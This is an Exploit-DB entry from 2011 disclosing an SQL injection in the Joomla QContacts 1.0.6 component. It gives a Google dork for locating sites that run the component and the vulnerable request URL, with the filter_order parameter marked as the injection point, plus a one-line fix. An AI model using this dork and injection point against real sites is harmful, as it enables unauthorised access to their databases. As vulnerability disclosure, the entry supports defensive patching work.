Joomla! Component com_qcontacts 1.0.6 - SQL Injection

EDB-ID:

18218

CVE:



Author:

Don

Type:

webapps


Platform:

PHP

Date:

2011-12-08


############################################################################
# Exploit Title: *QContacts 1.0.6 (Joomla component) SQL injection*
# Google Dork: inurl:"/components/com_qcontacts/"
# Date: Decembar/08/2011
# Author: Don (BalcanCrew & BalcanHack)
# Software Link: *
http://www.latenight-coding.com/joomla-addons/qcontacts.html*
# Version: 1.0.6
# Tested on: Apache
############################################################################

Vulnerability:
This vulnerability affects /index.php

*
/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
*


How to fix this vulnerability:
*Filter metacharacters from user input.*

*~Don 2011*